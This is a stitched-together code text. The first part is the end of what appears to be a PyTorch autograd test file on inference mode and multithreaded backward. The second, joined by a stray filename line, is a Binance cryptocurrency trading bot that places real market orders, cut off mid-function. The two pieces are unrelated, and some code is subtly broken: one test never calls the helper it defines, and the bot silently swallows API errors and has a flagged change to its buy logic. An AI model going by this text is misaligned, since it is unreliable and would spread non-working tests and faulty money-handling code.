        run_test(lambda x: x.transpose_(0, 1))

    def test_inference_mode_inf_tensor_in_inf_mode_view_op(self):
        with torch.inference_mode():
            for requires_grad in (True, False):
                c = torch.ones(1, 2, 3, requires_grad=requires_grad)

                # perform view operation produces inference tensor
                # that does not require grad
                view_out = c.view(-1)
                self.assertTrue(torch.is_inference(view_out))
                self.assertFalse(view_out.requires_grad)

    def test_inference_mode_inf_tensor_in_normal_mode_functional_op(self):
        def functional_op(x):
            return x * x

        for requires_grad in (True, False):
            with torch.inference_mode():
                c = torch.ones(1, 2, 3, requires_grad=requires_grad)

            # Outside the mode: output of a functional op on an inference
            # tensor is a normal, grad-less leaf.
            func_out = functional_op(c)
            self.assertFalse(torch.is_inference(func_out))
            self.assertFalse(func_out.requires_grad)
            self.assertTrue(func_out.is_leaf)

    def test_inference_mode_inf_tensor_in_normal_mode_inplace_op(self):
        def run_test(fn):
            for requires_grad in (False, True):
                with torch.inference_mode():
                    c = torch.ones(1, 2, 3, requires_grad=requires_grad)

                if requires_grad:
                    # leaf variable that requires grad is being used in an inplace
                    # operation when requires_grad=True
                    pass
                else:
                    err_msg = "Inplace update to inference tensor outside InferenceMode"
                    with self.assertRaisesRegex(RuntimeError, err_msg):
                        fn(c)
        run_test(lambda x: x.add_(2))
        run_test(lambda x: x.transpose_(0, 1))

    def test_inference_mode_inf_tensor_in_normal_mode_view_op(self):
        for requires_grad in (True, False):
            with torch.inference_mode():
                c = torch.ones(1, 2, 3, requires_grad=requires_grad)

            # A view of an inference tensor taken in normal mode is still an
            # inference tensor and is not tracked as a view by autograd.
            out = c.view(-1)
            self.assertTrue(torch.is_inference(out))
            self.assertFalse(out.requires_grad)
            self.assertFalse(out._is_view())
            self.assertTrue(out.is_leaf)

    def test_normal_tensor_inplace_output_in_inference_mode(self):
        def run_test(fn):
            for requires_grad in (True, False):
                s = torch.ones(1, 2, 3, requires_grad=requires_grad)
                a = s.clone()

                with torch.inference_mode():
                    # inplace on a normal tensor keeps it a normal tensor
                    fn(a)
                    self.assertFalse(torch.is_inference(a))
                    self.assertEqual(a.requires_grad, requires_grad)

                    # inplace -> inplace
                    fn(a)
                    self.assertFalse(torch.is_inference(a))
                    self.assertEqual(a.requires_grad, requires_grad)

                    # inplace -> inplace -> view
                    view_out = a.view(-1)
                    self.assertFalse(torch.is_inference(view_out))
                    self.assertEqual(view_out.requires_grad, requires_grad)
        run_test(lambda x: x.add_(2))
        run_test(lambda x: x.transpose_(0, 1))

    def test_normal_tensor_inplace_output_in_normal_mode(self):
        def run_test(fn):
            for requires_grad in (True, False):
                s = torch.ones(1, 2, 3, requires_grad=requires_grad)
                a = s.clone()

                with torch.inference_mode():
                    fn(a)
                    self.assertFalse(torch.is_inference(a))
                    self.assertEqual(a.requires_grad, requires_grad)

                # back in normal mode: further inplace ops are still fine
                fn(a)
                self.assertFalse(torch.is_inference(a))
                self.assertEqual(a.requires_grad, requires_grad)

                # inplace -> inplace
                fn(a)
                self.assertFalse(torch.is_inference(a))
                self.assertEqual(a.requires_grad, requires_grad)

                # inplace -> inplace -> view
                view_out = a.view(-1)
                self.assertFalse(torch.is_inference(view_out))
                self.assertEqual(view_out.requires_grad, requires_grad)
        run_test(lambda x: x.add_(2))
        run_test(lambda x: x.transpose_(0, 1))

    def test_normal_tensor_view_output_in_inference_mode(self):
        for requires_grad in (True, False):
            s = torch.ones(1, 2, 3, requires_grad=requires_grad)
            a = s.clone()

            with torch.inference_mode():
                # views of normal tensors stay normal (version tracked)
                out = a.view(-1)
                self.assertFalse(torch.is_inference(out))
                self.assertEqual(out.requires_grad, requires_grad)
                self.assertTrue(out._is_view())

                # view -> view
                tmp = out.view(-1)
                self.assertFalse(torch.is_inference(tmp))
                self.assertEqual(tmp.requires_grad, requires_grad)
                self.assertTrue(tmp._is_view())
                self.assertTrue(tmp.is_leaf)

                # view -> view -> inplace
                self.assertTrue(torch.is_inference_mode_enabled())
                tmp.add_(2)
                self.assertFalse(torch.is_inference(tmp))
                self.assertEqual(tmp.requires_grad, requires_grad)
                # Accessing is_leaf in python tries to update grad_fn and raises:
                # A view was created in inference mode and its base or
                # another view of its base has been modified inplace in normal mode
                # tmp.is_leaf
                self.assertEqual(a._version, tmp._version)

    def test_normal_tensor_view_output_in_normal_mode(self):
        def functional_op(x):
            return x * x

        for requires_grad in (True, False):
            s = torch.ones(1, 2, 3, requires_grad=requires_grad)
            a = s.clone()

            with torch.inference_mode():
                out = a.view(-1)
                self.assertFalse(torch.is_inference(out))
                self.assertEqual(out.requires_grad, requires_grad)
                self.assertTrue(out._is_view())
                self.assertTrue(out.is_leaf)

            tmp = functional_op(out)
            self.assertFalse(torch.is_inference(tmp))
            self.assertEqual(tmp.requires_grad, requires_grad)

            if requires_grad:
                err_msg = "A view was created in inference mode and is being modified inplace"
                with self.assertRaisesRegex(RuntimeError, err_msg):
                    out.add_(2)
                pass
            else:
                out.add_(2)

            tmp = out.view(2, 3)
            self.assertFalse(torch.is_inference(tmp))
            self.assertEqual(tmp.requires_grad, requires_grad)

    def test_mix_inference_and_normal_tensor_functional_op(self):
        for requires_grad in (True, False):
            s = torch.ones(1, 2, 3, requires_grad=requires_grad)

            with torch.inference_mode():
                c = torch.ones(1, 2, 3, requires_grad=requires_grad)

            # add is safe since it doesn't save any variable for backward
            out = c.add(s)
            self.assertFalse(torch.is_inference(out))
            self.assertEqual(out.requires_grad, requires_grad)
            if requires_grad:
                # leaf inference tensor with requires_grad=True can still have gradient
                out.backward(torch.ones_like(out))
                self.assertEqual(c.grad, torch.ones_like(c))

            if requires_grad:
                # mul saves its inputs for backward — not allowed for inference tensors
                err_msg = "Inference tensors cannot be saved for backward"
                with self.assertRaisesRegex(RuntimeError, err_msg):
                    c * s

                # inference tensor in TensorList input
                inputs = [s, c]
                with self.assertRaisesRegex(RuntimeError, err_msg):
                    torch.stack(inputs)

    def test_mix_inference_and_normal_tensor_inplace_op(self):
        for requires_grad in (True, False):
            s = torch.ones(1, 2, 3, requires_grad=requires_grad)
            a = s.clone()

            with torch.inference_mode():
                c = torch.ones(1, 2, 3)

            self.assertTrue(torch.is_inference(c))
            if requires_grad:
                err_msg = "Inference tensors cannot be saved for backward"
                with self.assertRaisesRegex(RuntimeError, err_msg):
                    a.mul_(c)

                # inference tensor in TensorList input
                err_msg = ("out=... arguments don't support automatic differentiation, "
                           "but one of the arguments requires grad")
                with self.assertRaisesRegex(RuntimeError, err_msg):
                    torch.mul(s, s, out=c)
            else:
                a.mul_(c)
                err_msg = "Inplace update to inference tensor outside InferenceMode is not allowed"
                with self.assertRaisesRegex(RuntimeError, err_msg):
                    torch.mul(s, s, out=c)

    def test_mix_inference_and_normal_tensor_view_op(self):
        for requires_grad in (True, False):
            s = torch.ones(1, 2, 3, requires_grad=requires_grad)

            with torch.inference_mode():
                c = torch.ones(1, 2, 3)

            # view_as is a composite op which calls view with only one
            # tensor argument. So there isn't a mixed inference and normal
            # tensor inputs for view ops
            tmp1 = c.view_as(s)
            self.assertTrue(torch.is_inference(tmp1))
            self.assertFalse(tmp1.requires_grad)

            # this is fine since its equivalent as s.view(c.sizes()) which
            # isn't a mixed input scenario
            tmp2 = s.view_as(c)
            self.assertFalse(torch.is_inference(tmp2))
            self.assertEqual(tmp2.requires_grad, requires_grad)

    def test_inference_mode_handle_direct_view_on_rebase(self):
        def run_test(fn):
            for requires_grad in (True, False):
                s = torch.ones(1, 2, 3, requires_grad=requires_grad)
                a = s.clone()

                with torch.inference_mode():
                    view_out = a.view_as(a)

                if requires_grad:
                    err_msg = "A view was created in inference mode and is being modified inplace"
                    with self.assertRaisesRegex(RuntimeError, err_msg):
                        fn(view_out)
                    pass
                else:
                    fn(view_out)
        run_test(lambda x: x.add_(2))
        run_test(lambda x: x.transpose_(0, 1))

    def test_inference_mode_handle_indirect_view_on_rebase(self):
        def run_test(fn):
            for requires_grad in (True, False):
                s = torch.ones(1, 2, 3, requires_grad=requires_grad)
                a = s.clone()

                with torch.inference_mode():
                    view_out = a.view(-1)

                # mutate the base outside inference mode, then touch the view
                fn(a)
                if requires_grad:
                    err_msg = "A view was created in inference mode and its base or another view "
                    with self.assertRaisesRegex(RuntimeError, err_msg):
                        view_out.grad_fn
                    pass
                else:
                    view_out.grad_fn
        run_test(lambda x: x.add_(2))
        run_test(lambda x: x.transpose_(0, 1))
class TestMultithreadAutograd(TestCase):
    """Tests that backward()/grad() behave correctly when driven from
    multiple Python threads or TorchScript fork/join tasks."""

    def _run_py_multithread_fn(self, fn, args=(), num_threads=10, kwargs=None):
        """Run `fn(*args)` concurrently on `num_threads` threads, re-raising
        the first child-thread exception in the caller on join."""
        # NOTE(review): `kwargs` is accepted but never forwarded to the
        # threads — confirm whether callers rely on it.

        class PropagatingThread(threading.Thread):
            '''Helper class to propagate exception from child
            thread to main thread on join.

            Reference: https://stackoverflow.com/a/31614591/5602957
            '''

            def run(self):
                self.exception = None
                try:
                    self.ret = super(PropagatingThread, self).run()
                except Exception as e:
                    self.exception = e

            def join(self, timeout=None):
                super(PropagatingThread, self).join(timeout)
                if self.exception:
                    raise self.exception from self.exception
                return self.ret

        threads = []
        for _ in range(num_threads):
            p = PropagatingThread(target=fn, args=args)
            p.start()
            threads.append(p)

        for p in threads:
            p.join()

    def test_multithreaded_exception_propagation(self):
        # Test whether exception in child thread
        # are propagated to main thread.
        def fn():
            self.assertTrue(False)

        with self.assertRaises(AssertionError):
            self._run_py_multithread_fn(fn)

    def test_simple_backward(self):
        # simple multithreaded backward that create threads in the beginning of training
        # and everything else is training separately, i.e. inputs, operations, etc.
        def train_fn():
            x = torch.ones(5, 5, requires_grad=True)
            y = (x + 3) * (x + 4) * 0.5
            y.sum().backward()
            self.assertEqual(x.grad, x + 3.5)

        self._run_py_multithread_fn(train_fn)

    def test_simple_backward_same_input(self):
        # simple multithreaded backward with only shared inputs (i.e. This is common
        # for things like Hogwild multithreaded training with multiple CPU threads)
        def train_fn_backward(x):
            y = (x + 3) * (x + 4) * 0.5
            y.sum().backward()

        x = torch.ones(5, 5, requires_grad=True)
        self._run_py_multithread_fn(train_fn_backward, (x,))
        # Since we are calling backward from multiple threads
        # and all threads share the same input, when we do backward
        # concurrently, different backwards will all accumulate to
        # the same .grad for each input, and the gradients should
        # be equal to num_threads * gradient
        self.assertEqual(x.grad, 10 * (x + 3.5))

        def train_fn_grad(x):
            y = (x + 3) * (x + 4) * 0.5
            grads = torch.autograd.grad(y.sum(), x)
            self.assertEqual(len(grads), 1)
            self.assertEqual(grads[0], x + 3.5)

        # since we use functional grad() api, gradients will not
        # be accumulate to the same place and should be the same
        self._run_py_multithread_fn(train_fn_grad, (x,))

    def test_multithread_saved_tensors_hooks(self):
        def pack(x):
            warnings.warn("pack")
            return x

        def registers_hooks_for_each_thread():
            with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
                x = torch.ones(5, 5, requires_grad=True)
                with warnings.catch_warnings(record=True) as w:
                    y = x * x
                    # should raise two warnings from x being saved twice
                    self.assertEqual(len(w), 2)
                y.sum().backward()
        # NOTE(review): registers_hooks_for_each_thread is defined but never
        # invoked here — a call like
        # self._run_py_multithread_fn(registers_hooks_for_each_thread)
        # appears to be missing; confirm against upstream.

    def test_dataparallel_saved_tensors_hooks(self):
        def pack(x):
            warnings.warn("pack")
            return x

        _self = self

        class Model(torch.nn.Module):
            def forward(self, x):
                with warnings.catch_warnings(record=True) as w:
                    y = x * x
                    if torch.cuda.device_count() >= 2:
                        # DataParallel is calling the forward in different threads
                        # without propagating TLS, so hooks should not be called here
                        _self.assertEqual(len(w), 0)
                    else:
                        # DataParallel only uses one thread
                        # so hooks should be called here
                        _self.assertGreater(len(w), 0)

        x = torch.ones(5, 5, requires_grad=True)
        model = torch.nn.DataParallel(Model())

        with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
            model(x)
            with warnings.catch_warnings(record=True) as w:
                y = x * x
                # hooks should be called here
                _self.assertGreater(len(w), 0)

    def test_python_thread_in_middle(self):
        # User might write a network that starts on one CPU thread, then runs its second half
        # concurrently with other threads (either via python threading or fork/join calls),
        # then calls backward()/grad() on BOTH threads, like a Y pattern from input at the
        # bottom to output at the top. This way part of the GraphTask is being shared across
        # different threads and we need to ensure user specify retain_graph=True, otherwise
        # error out with the correct error message

        # Case 1: multiple backward with python threads, retain_graph=False
        # should throw error in some threads with no retain_graph.
        success_vs_raises = [0, 0]

        def train_fn_no_retain_graph(x):
            y = x + x ** 2
            try:
                y.sum().backward()
                success_vs_raises[0] += 1
            except RuntimeError as error:
                success_vs_raises[1] += 1
                self.assertRegex(str(error), "Specify retain_graph=True")

        x_no_retain = torch.ones(5, 5, requires_grad=True)
        y_no_retain = x_no_retain + x_no_retain ** 2
        self._run_py_multithread_fn(train_fn_no_retain_graph, (y_no_retain,), num_threads=5)
        # at least one thread will be success in this case, all other threads should raise
        # with the error that throw to user to recommend them specify retain_graph=True
        self.assertTrue(success_vs_raises[0] >= 1)

        # multiple backward with python threads, no error with retain_graph=True
        def train_fn_retain_graph(x):
            y = x + x ** 2
            y.sum().backward(retain_graph=True)

        x_retain = torch.ones(5, 5, requires_grad=True)
        y_retain = x_retain + x_retain ** 2
        self._run_py_multithread_fn(train_fn_retain_graph, (y_retain,), num_threads=5)
        # result should equal to num_thread * gradients
        self.assertEqual(x_retain.grad, 5 * (4 * x_retain ** 3 + 6 * (x_retain ** 2) + 4 * x_retain + 1))

    def test_fork_join_in_middle(self):
        # multiple backward with jit threads (fork/join primitive)
        # similar to test_python_thread_in_middle, we test with retain_graph=False/True

        # Case 1: multiple grad() calls with jit threads, retain_graph=False
        # should throw error in some threads with no retain_graph.
        @torch.jit.script
        def train_fn_jit_no_retain(middle, orig_x):
            y = middle + middle ** 2
            return torch.autograd.grad([y.sum()], [orig_x])

        @torch.jit.script
        def train_fn_fork_join_calls_no_retain(x):
            y_no_retain = (x + 3) * (x + 4) * 0.5

            fut = torch.jit._fork(train_fn_jit_no_retain, y_no_retain, x)
            grad_hat = train_fn_jit_no_retain(y_no_retain, x)
            grad = torch.jit._wait(fut)
            return grad, grad_hat

        try:
            train_fn_fork_join_calls_no_retain(torch.randn(5, 5, requires_grad=True))
        except RuntimeError as error:
            self.assertRegex(str(error), "Specify retain_graph=True")

        # Case 2: no error with retain_graph=True
        @torch.jit.script
        def train_fn_jit_retain(middle, orig_x):
            y = middle + middle ** 2
            return torch.autograd.grad([y.sum()], [orig_x], retain_graph=True)

        @torch.jit.script
        def train_fn_fork_join_calls_retain(x):
            y_retain = (x + 3) * (x + 4) * 0.5
            fut1 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
            fut2 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
            grad = train_fn_jit_retain(y_retain, x)
            grad1 = torch.jit._wait(fut1)
            grad2 = torch.jit._wait(fut2)
            return grad, grad1, grad2

        grad, grad1, grad2 = train_fn_fork_join_calls_retain(torch.randn(5, 5, requires_grad=True))
        self.assertEqual(grad, grad1)
        self.assertEqual(grad, grad2)

    def test_preserve_backtrace(self):
        """An exception raised inside a custom Function's backward must keep
        the original traceback when surfaced by the autograd engine."""
        class Foo(torch.autograd.Function):
            @staticmethod
            def forward(ctx, input):
                return input

            @staticmethod
            def backward(ctx, *grad):
                raise ValueError("something")

        t = torch.rand(10, requires_grad=True)
        try:
            Foo.apply(t).sum().backward()
        except Exception:
            import traceback
            tb = sys.exc_info()[2]
            tb_str = "\n".join(traceback.format_tb(tb))
            self.assertTrue('raise ValueError("something")' in tb_str)

    # TODO(@anjali411): add an OpInfo based test for torch.cat
    # Issue: https://github.com/pytorch/pytorch/issues/51627
    def test_cat_r_to_c(self):
        inp_c = torch.rand(3, 2, dtype=torch.cdouble, requires_grad=True)
        inp_r = torch.randn(3, 2, dtype=torch.double, requires_grad=True)

        def fn(x1, x2):
            return torch.cat((x1, x2), dim=-1)

        torch.autograd.gradcheck(fn, [inp_r, inp_c], check_forward_ad=True)
        torch.autograd.gradcheck(fn, [inp_c, inp_r], check_forward_ad=True)
# Generate per-device concrete test classes from the generic template,
# e.g., TestAutogradDeviceTypeCPU and TestAutogradDeviceTypeCUDA
instantiate_device_type_tests(
    TestAutogradDeviceType,
    globals(),
    except_for=None
)

if __name__ == '__main__':
    run_tests()
|
Binance Detect Moonings.py | """
Disclaimer
All investment strategies and investments involve risk of loss.
Nothing contained in this program, scripts, code or repository should be
construed as investment advice. Any reference to an investment's past or
potential performance is not, and should not be construed as, a recommendation
or as a guarantee of any specific outcome or profit.
By using this program you accept all liabilities,
and that no claims can be made against the developers,
or others connected with the program.
"""
# use for environment variables
import os
# use if needed to pass args to external modules
import sys
# used to create threads & dynamic loading of modules
import threading
import importlib
# used for directory handling
import glob
# Needed for colorful console output Install with: python3 -m pip install colorama (Mac/Linux) or pip install colorama (PC)
from colorama import init
init()
# needed for the binance API / websockets / Exception handling
from binance.client import Client
from binance.exceptions import BinanceAPIException
# used for dates
from datetime import date, datetime, timedelta
import time
# used to repeatedly execute the code
from itertools import count
# used to store trades and sell assets
import json
# Load helper modules
from helpers.parameters import (
parse_args, load_config
)
# Load creds modules
from helpers.handle_creds import (
load_correct_creds, test_api_key
)
# for colourful logging to the console
class txcolors:
    # ANSI escape sequences used to colour console output by event type.
    BUY = '\033[92m'          # bright green: buy actions
    WARNING = '\033[93m'      # bright yellow: warnings
    SELL_LOSS = '\033[91m'    # bright red: sells at a loss
    SELL_PROFIT = '\033[32m'  # green: sells at a profit
    DIM = '\033[2m\033[35m'   # dim magenta: timestamps / low-priority text
    DEFAULT = '\033[39m'      # reset foreground to the terminal default
# tracks profit/loss each session
# NOTE(review): a `global` statement at module level is a no-op — these
# names are already module globals; kept only as documentation of intent.
global session_profit, trades_won, trades_lost, is_bot_running
trades_won = 0        # count of closed trades with non-negative price change
trades_lost = 0       # count of closed trades with negative price change
session_profit = 0    # cumulative session P/L in percent
is_bot_running = True # flag other threads/modules can check to stop the bot
# print with timestamps: wrap sys.stdout so every new output line is
# prefixed with a dimmed [YYYY-MM-DD HH:MM:SS] stamp.
old_out = sys.stdout


class St_ampe_dOut:
    """Stamped stdout."""
    # True when the next write starts a fresh line (so it gets a timestamp).
    nl = True

    def write(self, x):
        """Write function overloaded."""
        if x == '\n':
            # bare newline: pass through and remember we're at line start
            old_out.write(x)
            self.nl = True
        elif self.nl:
            # start of a new line: prepend the timestamp prefix
            old_out.write(f'{txcolors.DIM}[{str(datetime.now().replace(microsecond=0))}]{txcolors.DEFAULT} {x}')
            self.nl = False
        else:
            # continuation of the current line: no prefix
            old_out.write(x)

    def flush(self):
        # no buffering of our own; flushing is a no-op
        pass


sys.stdout = St_ampe_dOut()
def get_price(add_to_historical=True):
    '''Return the current price for all coins on binance.

    Filters tickers down to the configured quote pair (PAIR_WITH), honouring
    CUSTOM_LIST/tickers and excluding FIATS. When add_to_historical is True,
    the snapshot is also stored in the historical_prices ring buffer at the
    advanced hsp_head position.
    '''
    global historical_prices, hsp_head

    initial_price = {}
    prices = client.get_all_tickers()

    for coin in prices:
        if CUSTOM_LIST:
            # only coins from the custom ticker list, quoted in PAIR_WITH,
            # and not containing any fiat symbol
            if any(item + PAIR_WITH == coin['symbol'] for item in tickers) and all(item not in coin['symbol'] for item in FIATS):
                initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
        else:
            # any symbol containing the quote currency, excluding fiats
            if PAIR_WITH in coin['symbol'] and all(item not in coin['symbol'] for item in FIATS):
                initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}

    if add_to_historical:
        # advance the ring-buffer head, wrapping at RECHECK_INTERVAL
        hsp_head += 1

        if hsp_head == RECHECK_INTERVAL:
            hsp_head = 0

        historical_prices[hsp_head] = initial_price

    return initial_price
def wait_for_price():
    '''calls the initial price and ensures the correct amount of time has passed
    before reading the current price again.

    Returns:
        tuple: (volatile_coins dict of coin -> gain %, number of volatile
        coins, latest price snapshot from historical_prices).
    '''
    global historical_prices, hsp_head, volatility_cooloff

    volatile_coins = {}
    externals = {}
    coins_up = 0
    coins_down = 0
    coins_unchanged = 0

    # blocks while the "signals/paused.exc" sentinel file exists
    pause_bot()

    # Use the BNB pair's timestamp as a proxy for when the last snapshot was
    # taken; sleep off any remainder of the recheck interval.
    if historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'] > datetime.now() - timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)):
        # sleep for exactly the amount of time required
        time.sleep((timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)) - (datetime.now() - historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'])).total_seconds())

    print(f'Working...Session profit:{session_profit:.2f}% Est:${(QUANTITY * MAX_COINS * session_profit)/100:.2f}')

    # retrieve latest prices
    get_price()

    externals = external_signals()
    exnumber = 0

    # calculate the difference in prices
    for coin in historical_prices[hsp_head]:

        # minimum and maximum prices over time period (None slots in the
        # ring buffer are pushed to the extremes so they are never picked)
        min_price = min(historical_prices, key = lambda x: float("inf") if x is None else float(x[coin]['price']))
        max_price = max(historical_prices, key = lambda x: -1 if x is None else float(x[coin]['price']))

        # signed percent change; negative when the max preceded the min
        threshold_check = (-1.0 if min_price[coin]['time'] > max_price[coin]['time'] else 1.0) * (float(max_price[coin]['price']) - float(min_price[coin]['price'])) / float(min_price[coin]['price']) * 100

        # each coin with higher gains than our CHANGE_IN_PRICE is added to the volatile_coins dict if less than MAX_COINS is not reached.
        # NOTE(review): gating on `coin in externals` means a price move alone
        # never triggers a buy — an external signal is also required. This
        # looks like a local modification; confirm it is intentional.
        if coin in externals and threshold_check > CHANGE_IN_PRICE:
            coins_up +=1

            if coin not in volatility_cooloff:
                volatility_cooloff[coin] = datetime.now() - timedelta(minutes=TIME_DIFFERENCE)

            # only include coin as volatile if it hasn't been picked up in the last TIME_DIFFERENCE minutes already
            if datetime.now() >= volatility_cooloff[coin] + timedelta(minutes=TIME_DIFFERENCE):
                volatility_cooloff[coin] = datetime.now()

                if len(coins_bought) + len(volatile_coins) < MAX_COINS or MAX_COINS == 0:
                    volatile_coins[coin] = round(threshold_check, 3)
                    print(f'{coin} has gained {volatile_coins[coin]}% within the last {TIME_DIFFERENCE} minutes, calculating volume in {PAIR_WITH}')
                else:
                    print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but you are holding max number of coins{txcolors.DEFAULT}')
        elif threshold_check < CHANGE_IN_PRICE:
            coins_down +=1
        else:
            coins_unchanged +=1

    # Disabled until fix
    #print(f'Up: {coins_up} Down: {coins_down} Unchanged: {coins_unchanged}')

    # Here goes new code for external signalling
    '''for excoin in externals:
        if excoin not in volatile_coins and excoin not in coins_bought and (len(coins_bought) + exnumber) < MAX_COINS:
            volatile_coins[excoin] = 1
            exnumber +=1
            print(f'External signal received on {excoin}, calculating volume in {PAIR_WITH}')'''

    return volatile_coins, len(volatile_coins), historical_prices[hsp_head]
def external_signals():
    """Read buy signals dropped by external signalling modules.

    Scans ``signals/*.exs``; every non-empty line in each file is treated as
    a symbol. Each consumed file is deleted so a signal only fires once.

    Returns:
        dict: symbol -> symbol for every signal read.
    """
    external_list = {}

    # check directory and load pairs from files into external_list
    for filename in glob.glob("signals/*.exs"):
        # `with` guarantees the handle is closed (the old code leaked it
        # by iterating a bare open(), which also kept the file locked on
        # Windows while os.remove ran).
        with open(filename) as signal_file:
            for line in signal_file:
                symbol = line.strip()
                # skip blank lines so '' never becomes a phantom symbol
                if symbol:
                    external_list[symbol] = symbol
        try:
            os.remove(filename)
        except OSError:
            # narrow except: only filesystem errors are expected here
            if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file{txcolors.DEFAULT}')

    return external_list
def sell_external_signals():
    """Read sell signals dropped by external signalling modules.

    Scans ``signals/*.sell``; every non-empty line in each file is treated
    as a symbol. Each consumed file is deleted so a signal only fires once.

    Returns:
        dict: symbol -> symbol for every sell signal read.
    """
    external_list = {}

    # check directory and load pairs from files into external_list
    for filename in glob.glob("signals/*.sell"):
        # `with` guarantees the handle is closed (the old code leaked it
        # by iterating a bare open()).
        with open(filename) as signal_file:
            for line in signal_file:
                symbol = line.strip()
                # skip blank lines so '' never becomes a phantom symbol
                if symbol:
                    external_list[symbol] = symbol
        try:
            os.remove(filename)
        except OSError:
            # narrow except: only filesystem errors are expected here
            if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file{txcolors.DEFAULT}')

    return external_list
def pause_bot():
    '''Pause the script when external indicators detect a bearish trend in
    the market. Blocks while the sentinel file "signals/paused.exc" exists;
    selling (stop loss / take profit) keeps running during the pause.
    '''
    global bot_paused, session_profit, hsp_head

    # start counting for how long the bot's been paused
    start_time = time.perf_counter()

    while os.path.isfile("signals/paused.exc"):

        if bot_paused == False:
            print(f'{txcolors.WARNING}Pausing buying due to change in market conditions, stop loss and take profit will continue to work...{txcolors.DEFAULT}')
            bot_paused = True

        # Sell function needs to work even while paused
        coins_sold = sell_coins()
        remove_from_portfolio(coins_sold)
        get_price(True)

        # pausing here; only log once per buffer cycle to avoid spam
        if hsp_head == 1: print(f'Paused...Session profit:{session_profit:.2f}% Est:${(QUANTITY * MAX_COINS * session_profit)/100:.2f}')
        time.sleep((TIME_DIFFERENCE * 60) / RECHECK_INTERVAL)

    else:
        # while/else: runs when the loop condition goes false (file removed
        # or never present). Stop counting the pause time.
        stop_time = time.perf_counter()
        time_elapsed = timedelta(seconds=int(stop_time-start_time))

        # resume the bot and set bot_paused back to False
        if bot_paused == True:
            print(f'{txcolors.WARNING}Resuming buying due to change in market conditions, total sleep time: {time_elapsed}{txcolors.DEFAULT}')
            bot_paused = False

    return
def convert_volume():
    '''Converts the volume given in QUANTITY from USDT to the each coin's volume,
    rounded to each symbol's exchange-mandated lot-size step.

    Returns:
        tuple: (volume dict of coin -> order quantity, latest price snapshot).
    '''
    volatile_coins, number_of_coins, last_price = wait_for_price()
    lot_size = {}
    volume = {}

    for coin in volatile_coins:

        # Find the correct step size for each coin
        # max accuracy for BTC for example is 6 decimal points
        # while XRP is only 1
        try:
            info = client.get_symbol_info(coin)
            # filters[2] is assumed to be LOT_SIZE — TODO confirm against the
            # exchange-info schema; position of filters is not guaranteed.
            step_size = info['filters'][2]['stepSize']
            # e.g. "0.001000" -> index('1') == 4 -> 3 decimal places
            lot_size[coin] = step_size.index('1') - 1

            if lot_size[coin] < 0:
                lot_size[coin] = 0

        except:
            # NOTE(review): bare except silently swallows API/schema errors;
            # the coin then falls through to the 1-decimal default below.
            pass

        # calculate the volume in coin from QUANTITY in USDT (default)
        volume[coin] = float(QUANTITY / float(last_price[coin]['price']))

        # define the volume with the correct step size
        if coin not in lot_size:
            volume[coin] = float('{:.1f}'.format(volume[coin]))
        else:
            # if lot size has 0 decimal points, make the volume an integer
            if lot_size[coin] == 0:
                volume[coin] = int(volume[coin])
            else:
                volume[coin] = float('{:.{}f}'.format(volume[coin], lot_size[coin]))

    return volume, last_price
def buy():
    '''Place Buy market orders for each volatile coin found.

    In TEST_MODE a fake order record is created instead of hitting the API.

    Returns:
        tuple: (orders dict of coin -> order info list, latest price
        snapshot, volume dict used for the orders).
    '''
    volume, last_price = convert_volume()
    orders = {}

    for coin in volume:

        # only buy if the there are no active trades on the coin
        if coin not in coins_bought:
            print(f"{txcolors.BUY}Preparing to buy {volume[coin]} {coin}{txcolors.DEFAULT}")

            if TEST_MODE:
                # simulate the order locally; orderId 0 marks it as fake
                orders[coin] = [{
                    'symbol': coin,
                    'orderId': 0,
                    'time': datetime.now().timestamp()
                }]

                # Log trade
                if LOG_TRADES:
                    write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}")

                continue

            # try to create a real order if the test orders did not raise an exception
            try:
                buy_limit = client.create_order(
                    symbol = coin,
                    side = 'BUY',
                    type = 'MARKET',
                    quantity = volume[coin]
                )

            # error handling here in case position cannot be placed
            except Exception as e:
                print(e)

            # run the else block if the position has been placed and return order info
            else:
                orders[coin] = client.get_all_orders(symbol=coin, limit=1)

                # binance sometimes returns an empty list, the code will wait here until binance returns the order
                while orders[coin] == []:
                    print('Binance is being slow in returning the order, calling the API again...')

                    orders[coin] = client.get_all_orders(symbol=coin, limit=1)
                    time.sleep(1)

                # while/else: runs once the order list is non-empty
                else:
                    print('Order returned, saving order to file')

                    # Log trade
                    if LOG_TRADES:
                        write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}")

        else:
            print(f'Signal detected, but there is already an active trade on {coin}')

    return orders, last_price, volume
def sell_coins():
    '''sell coins that have reached the STOP LOSS or TAKE PROFIT threshold.

    Also honours external sell signals and, with USE_TRAILING_STOP_LOSS, ratchets
    TP/SL upward instead of selling when the price exceeds TP.  Mutates the
    global trade counters and session_profit.  Returns the dict of coins sold
    this pass (same records as coins_bought).
    '''
    global hsp_head, session_profit, trades_won, trades_lost
    externals = sell_external_signals()
    last_price = get_price(False) # don't populate rolling window
    #last_price = get_price(add_to_historical=True) # don't populate rolling window
    coins_sold = {}
    if USE_SESSION_THRESHOLD:
        check_total_session_profit(coins_bought, last_price)
        #TODO: call sell_external_signals() here
    # iterate over a snapshot since entries may conceptually be removed later
    for coin in list(coins_bought):
        # define stop loss and take profit (absolute prices derived from the
        # percentage thresholds stored per coin)
        TP = float(coins_bought[coin]['bought_at']) + (float(coins_bought[coin]['bought_at']) * coins_bought[coin]['take_profit']) / 100
        SL = float(coins_bought[coin]['bought_at']) + (float(coins_bought[coin]['bought_at']) * coins_bought[coin]['stop_loss']) / 100
        LastPrice = float(last_price[coin]['price'])
        BuyPrice = float(coins_bought[coin]['bought_at'])
        PriceChange = float((LastPrice - BuyPrice) / BuyPrice * 100)
